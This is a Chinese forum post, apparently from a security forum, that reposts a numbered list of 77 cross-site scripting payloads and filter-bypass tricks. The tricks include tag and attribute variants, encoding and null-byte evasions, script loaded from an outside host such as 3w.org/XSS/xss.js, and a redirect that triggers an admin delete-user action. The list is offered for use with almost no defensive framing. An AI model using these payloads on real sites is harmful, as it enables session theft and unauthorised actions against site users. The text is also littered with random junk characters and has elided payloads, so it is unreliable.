貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
0 g) T- d3 I: C. Y7 R) b+ D/ p) G% W* h
(1)普通的XSS JavaScript注入! P) O' A2 I8 @' N
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; |! A6 Q; n2 l0 X/ [9 N7 s
- y, F+ p: v( `# |. m- A! P (2)IMG标签XSS使用JavaScript命令
$ i% H L) N3 Z {8 p6 P/ r <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 k& ]' f7 I. {
0 U$ P' h9 d3 D0 e (3)IMG标签无分号无引号) m, w6 @3 o# w* e
<IMG SRC=javascript:alert(‘XSS’)>
, |0 s$ U# j( {( G) F3 R% h: k1 r, w' ?9 o$ B! Z& R% w) Y$ V
(4)IMG标签大小写不敏感
" x; V: @9 L! ]( ?9 o1 @+ G% L <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 T. }$ g" _& R3 }2 [3 J. s0 V
6 `( _9 ` g; J8 V (5)HTML编码(必须有分号)
" V* Q6 {+ S) w9 z+ K) F4 Z2 y8 L: q <IMG SRC=javascript:alert(“XSS”)>
/ [2 p& P( ] M y- G) m/ o4 R# m: Z0 J' `) I, Z! r
(6)修正缺陷IMG标签0 Z& M1 ]4 t$ K. O& g; N/ V2 i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”># ]/ F* i* _ g. \4 j$ b2 H1 U
0 k. S8 Y5 U0 u6 i2 w (7)formCharCode标签(计算器)5 `1 Z$ j5 ]6 K g q3 x& n
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
: q3 r/ |2 H" x- q! z, D' G2 r
5 E) r& o/ K2 v (8)UTF-8的Unicode编码(计算器)4 U2 Q6 R5 d0 X
<IMG SRC=jav..省略..S')>& u! z7 E' T) f& R2 t% S/ q1 l& ?% ]
2 k# T3 k! H6 Q. |& z5 |% X (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
. ?) ~; |- h, q1 u- e* z6 X* j <IMG SRC=jav..省略..S')>* r5 t5 L# C$ Z1 H: Q* p/ u' `. l) f
: N$ u8 e' e. Y- k/ I+ e( Y1 R (10)十六进制编码也是没有分号(计算器)
( _* ^" `1 F+ d. ^5 I" n <IMG SRC=java..省略..XSS')>; } B: {5 A( W; \ j# W8 ?# v6 ?
. G) G8 [( \# Q& A. O' M* T& \
(11)嵌入式标签,将Javascript分开* T1 s; n* k% M1 S% {
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ A0 [$ E; f0 [% i9 V. j
) N3 L' R# D# x5 C
(12)嵌入式编码标签,将Javascript分开
1 y0 E0 S9 `: Z, {2 D: ^* T3 Q+ ~ <IMG SRC=”jav ascript:alert(‘XSS’);”>0 h e' \* s6 P. R$ y( a! S
2 T* f* [3 V4 Q- d (13)嵌入式换行符
3 G1 e: Z6 ?( ]7 d, I2 `# r% m <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 n" D6 g' b% x H6 B+ X1 K1 U9 ?8 V1 o' O
(14)嵌入式回车
+ j# K8 p8 b( N; _ <IMG SRC=”jav ascript:alert(‘XSS’);”>
9 _. w4 n: z6 D. d$ E# i
1 K' g! g- u/ i) O" J8 V (15)嵌入式多行注入JavaScript,这是XSS极端的例子
) s% Q3 Q' j" z4 M& J: R7 C <IMG SRC=”javascript:alert(‘XSS‘)”>9 O- F! r) G4 K4 }) A
' P# ^8 u: h* p! A
(16)解决限制字符(要求同页面)
( g2 z# L" v0 D1 G8 A. {) x& r <script>z=’document.’</script> |% f& m6 x% M0 U3 J
<script>z=z+’write(“‘</script>
. O8 P6 e$ \' D: Q' e7 z" V <script>z=z+’<script’</script>
" V1 m+ U7 F. ~( N <script>z=z+’ src=ht’</script>, P X9 e3 a; E( d) _. R& ~! ]9 K$ i# J
<script>z=z+’tp://ww’</script>
+ ?) i7 Q# l8 V <script>z=z+’w.shell’</script>7 u Y) z$ p7 z
<script>z=z+’.net/1.’</script>
3 v8 W6 G5 X1 y# l2 d7 _: G <script>z=z+’js></sc’</script>
# A: y* h" p% J* o$ z8 _# X0 r <script>z=z+’ript>”)’</script>
) ^2 P0 y1 V; S! I9 X& q <script>eval_r(z)</script>5 { k3 S G' I
$ v; t% |0 _ @( X0 w
(17)空字符" B1 q& f5 O# G- l, P
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 y) I% b( z6 S2 V4 W2 Q
$ O4 w& j: R$ v% k+ n1 s) c (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 H+ |" ]" Y8 F) f! |
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
# ?; |* B+ O' i, ?- }7 Y: b6 t; e) b1 D% O0 l5 C0 V
(19)Spaces和meta前的IMG标签6 |$ c1 o1 Q: _9 P1 Z5 d
<IMG SRC=” � javascript:alert(‘XSS’);”>7 v' b2 V9 z2 f, ]
: B4 v2 |2 w7 O8 V
(20)Non-alpha-non-digit XSS/ f0 V$ e3 ?- h$ L% R
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. P% L4 f, D# [. B; Q% N
+ v4 u3 L( x; M b- Y" t% C (21)Non-alpha-non-digit XSS to 2
+ ?, d7 c9 y8 C. w% Y+ _ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
: y% ?! e- |: x- n7 y. E. [+ t( @7 j
( Z* o" l$ M! O+ D (22)Non-alpha-non-digit XSS to 3
7 A5 z" p2 @5 ~: j& z2 C4 p: } <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>' G |. q+ P" y4 C
) {7 x% b, u0 }6 ~4 ` @+ r2 r# f) O: N
(23)双开括号
6 Z+ e2 _% S/ z3 c% |* u <<SCRIPT>alert(“XSS”);//<</SCRIPT>6 v2 g0 T& W& w3 f
3 [5 ^$ H g4 _ (24)无结束脚本标记(仅火狐等浏览器): j8 w! b, {% v @1 X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! N6 J6 D# R$ M. L5 g- u* \! s# }. ^
(25)无结束脚本标记2
# r0 \$ p6 c* e m3 G. [ <SCRIPT SRC=//3w.org/XSS/xss.js>
; c) B% y3 l4 c3 t4 e# U5 A0 q2 u/ J0 B7 C& }2 F
(26)半开的HTML/JavaScript XSS
; ^% K, @7 R6 g* M9 ?( c <IMG SRC=”javascript:alert(‘XSS’)”6 I& I9 }1 q& }" J' ^3 Q) P4 D; M
' c0 W# P- o; C$ V6 V! ~& N
(27)双开角括号
$ p# M8 G8 s* M, B3 _$ O <iframe src=http://3w.org/XSS.html <
9 e' e2 s( `+ m R* V+ T1 q, U' V* s6 ?3 M* f/ c6 O! h: V9 ^
(28)无单引号 双引号 分号
6 i+ J v0 J' O0 @ <SCRIPT>a=/XSS/
1 F% i7 }) P. R# W* s/ n alert(a.source)</SCRIPT>7 ^# b, A" N0 x# T) j
7 W7 S7 {: \! P# J& o (29)换码过滤的JavaScript' Y" J" P/ w' c1 S) A
\”;alert(‘XSS’);//
" `; p( L' g. H" {- R1 e4 P% `9 t- Z$ a3 l# f8 K
(30)结束Title标签% H, B8 `' J2 v& t0 P0 P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
3 I8 A7 o! y: l/ F) A* _ ^; C7 ]+ J* `8 Y5 @1 Z
(31)Input Image7 Y7 u. n# @- W$ R' x- P' E* D
<INPUT SRC=”javascript:alert(‘XSS’);”>1 M1 k7 y: B% ]% l* N
3 F$ P1 A4 Y3 Z6 V/ z' I% W7 z0 C9 o (32)BODY Image
, g$ T2 V+ j2 _. s& b4 e0 ]& J <BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 w" j& n d2 t" {3 i/ ^- r
9 _& {! W* F9 s5 l (33)BODY标签0 m( z$ r# i5 S
<BODY(‘XSS’)>
& G* N. U3 E7 t. Z" j( O0 k
" ?9 h+ \, i* _" ^( m (34)IMG Dynsrc
' P* S( p5 `) j' K <IMG DYNSRC=”javascript:alert(‘XSS’)”>
- |7 h, w2 M0 Q' l/ t9 R! J6 P2 v* q5 Q
(35)IMG Lowsrc0 H- t8 E" _0 E6 R9 ?: v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. a6 n& N8 H- }6 m! m _
4 N7 }9 X2 c: |; M" m* { (36)BGSOUND" X, k/ J: s% W6 N: k6 j
<BGSOUND SRC=”javascript:alert(‘XSS’);”>( B7 n8 P% @5 J8 r0 w9 v
' T9 a' [% `/ L' ?
(37)STYLE sheet
( r- _$ N0 l3 O9 H6 [ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 B* { w2 _7 B% r. S
4 b) B. _* W1 ~: c (38)远程样式表
; m8 D$ v0 L, L c+ V <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”> w5 i$ I/ f3 t) T+ L
6 C: R$ H' U. e0 _
(39)List-style-image(列表式)
+ ?9 b$ M+ ~* I) i' M3 U( ^3 x <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS* L0 L, J0 v1 h: f T
: G0 Z3 {. V; y) G' [/ N (40)IMG VBscript
. U3 g3 a, C ^7 Q1 ~ y <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS: q" |% A/ C3 ` Y7 q! x) L
' T/ h" C% p5 Q0 x+ { (41)META链接url
$ E( u. I4 h: ]7 S) v$ l <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>9 w, G! V; r+ f
4 J1 [' o! m# E6 |! U5 n (42)Iframe
$ f; v# J3 o' g <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# T" t5 E4 M' a4 L2 ^7 k$ M$ K1 u& U' z0 |! W$ s- u
(43)Frame" z* B, F5 n8 t F0 l
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>: M" n$ }7 u8 q
# ]" l: N. I" R1 Y8 h! @* T
(44)Table
2 j6 L/ {8 X1 c: ` S2 c <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 K5 K9 T+ y, H" S
$ j3 W) N& i) b+ O9 \ (45)TD
+ R: j A3 y+ M! i/ H6 A- M# t <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 E) S7 d. h1 W: c1 J
# _5 Q* c' @! A (46)DIV background-image
" t5 A/ o2 n7 A5 p <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ }& @# V1 k n6 P2 M. i o3 {8 a
4 {- u1 _, K# H9 Z) x# ^ (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 p& \$ {; x. z2 u9 e6 Y# K4 x <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
. G' Y4 @2 b: k0 I$ g0 }9 P0 N! f! ?; Q: x7 Q3 [
(48)DIV expression; L6 T' _% B( x4 A
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 U* `2 Y9 i* {: ^+ o+ x+ L, i! w- u" D% A4 O7 ~
(49)STYLE属性分拆表达
7 T" Q0 g) `8 V& j) j# n <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 D8 B( W* b, t9 f6 o
& S. }) L0 f) N, W" j6 k
(50)匿名STYLE(组成:开角号和一个字母开头)
4 u0 d6 ] r8 c* y+ n <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 O$ _/ q' z- J3 D, O
, Q k& T; V2 [' U8 L
(51)STYLE background-image
; u7 Z( m3 h7 h7 e2 ~! q <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 D( Y" R1 D! g8 @
! F) g3 O& T% r; r
(52)IMG STYLE方式
; ]# C6 c5 ]* P8 Z exppression(alert(“XSS”))’>
& v6 ?& f6 x; l+ X; r3 I( V3 T2 g7 s' W$ K
(53)STYLE background
|6 _5 U( S9 w: a/ Z2 T <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ I% a( q1 L: l( W; f# c4 h% A
1 c$ o F% Z$ }. e, o0 I/ | (54)BASE- [" P8 C* d2 @- _( h& P
<BASE HREF=”javascript:alert(‘XSS’);//”>* Q/ e. i3 L0 a; E# c3 I8 X. y1 a
8 A2 N4 n6 U- R8 g6 p) _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! I0 @& `# A0 `4 g <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
. e4 \6 |. q+ J$ A P, B
! _6 N- Z8 u0 p2 \$ v% a (56)在flash中使用ActionScrpt可以混进你XSS的代码) I& G* ?$ o* O
a=”get”;
( |3 ` s: q, o b=”URL(\”";
- E8 @5 K* ]! R0 x8 c c=”javascript:”;
: F6 R! k6 F F A; l d=”alert(‘XSS’);\”)”;5 O5 X, \$ q4 w, k' G! ^
eval_r(a+b+c+d);
- P$ e* F, Q. R- H
0 T& Q! }3 q( b9 ^% x+ l: E (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上& [+ q3 B( J* R+ e% r. O" c5 W
<HTML xmlns:xss>/ Y* O6 Z$ D! b6 b& C
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
: Y2 f ~+ I% H7 I <xss:xss>XSS</xss:xss>3 ?9 [$ H& o8 q; F7 Q K
</HTML>" F6 m: ~2 I" @
6 A7 z7 U( f+ X" H8 _. U (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% f5 f1 O2 }' z <SCRIPT SRC=””></SCRIPT>
* G, @" F7 z6 o4 i( K% Z
5 s" p# N; }# d6 B (59)IMG嵌入式命令,可执行任意命令
1 D6 Z' A6 T; H+ C$ ~( M0 ] <IMG SRC=”http://www.XXX.com/a.php?a=b”>7 D& S4 k& t1 i" q
+ T4 z+ @: y% w2 e# p) p9 u
(60)IMG嵌入式命令(a.jpg在同服务器)0 n4 o" j& `( n \7 @4 H% p2 d
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- }! Q3 E6 m& Q) f1 |" K
- k3 V# o7 ]- z
(61)绕符号过滤
% {$ i: H% x) {* k: ^ <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>$ v" c0 Q% w/ q. Q
{* ^$ N* |8 U6 i8 L
(62)
& n) p7 O8 S) |9 C$ Y4 | <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 o7 g0 P$ x Z+ E F, d! d2 G
4 [8 d/ [- }, L- I
(63)
9 X9 i% b5 W" p/ g$ x! D <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
3 j: `/ S$ D# E# u" _: z9 i+ \# b9 L8 B( Y
(64)
/ B' L! {% j2 A, \2 v! c) W <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>$ l5 Y! C( R4 W' e
+ D/ n+ ^4 O# Y5 e# V" ~6 e (65)
7 W- K7 ~2 T7 J2 C2 A <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 i! H: x# X( ]0 q( s# [; C/ Z8 K$ Y7 t1 |5 @$ W
(66)
! S! j) f1 ]7 [) c$ ^# G <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 P8 P+ a% J8 @! M" y! b
' }$ k5 b: U' y. L (67)
8 P# W4 s2 F- q! h; \ <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( n: O( H' n! r: x1 T
, F9 x0 r$ k) l/ } (68)URL绕行
5 M- X5 t, Y0 A1 b <A HREF=”http://127.0.0.1/”>XSS</A>3 v3 y X# ~; \$ f" [
% L. n0 _( m4 U9 S) p (69)URL编码, {4 P6 J" U$ Q/ y' j
<A HREF=”http://3w.org”>XSS</A>
+ v8 n3 o/ P8 ?: \/ ~( M5 d) \) a
(70)IP十进制6 g* X5 w8 i. t- K1 ~7 m
<A HREF=”http://3232235521″>XSS</A>
9 C" ~4 s3 N e: ^6 v7 t) a) N4 D+ U3 G2 D$ I& Q4 Q
(71)IP十六进制9 K% p- O) R9 r: \, S
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 U$ u9 l' b: C7 @, D
. E. K0 [. ^3 y. @/ S) G5 I9 v (72)IP八进制- \( |5 M6 a( e& T: ?' A* d
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
6 |' V4 Z1 v: C% P+ w9 m$ g$ K
( x& q a: o; H% I# @* \" M (73)混合编码
4 r$ {7 ]" C' `0 U1 L, |5 e <A HREF=”h9 K$ K! s" I! H3 N6 B7 i
tt p://6 6.000146.0×7.147/”">XSS</A>
6 x4 P( K0 ~) a5 Y
$ o9 ?* n/ D" f# S p (74)节省[http:]
$ Y' G$ N% C4 c4 J/ R G <A HREF=”//www.google.com/”>XSS</A>/ E6 @1 ]! E5 R* T* x u
$ s2 u3 S4 k+ ?5 X l" m (75)节省[www]) ~5 o0 @ ^. h& i. {
<A HREF=”http://google.com/”>XSS</A>
2 @3 M" {6 U$ Y1 X# K9 N3 |: I! Z& q- n
(76)绝对点绝对DNS+ g" Y t% h' E' _% m8 v$ p
<A HREF=”http://www.google.com./”>XSS</A>
% y, S7 v* m! f' x3 B' i5 ]8 D n% G" H, V% u2 D0 h7 p
(77)javascript链接
4 p- y* \/ O, V9 u& m, ? <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对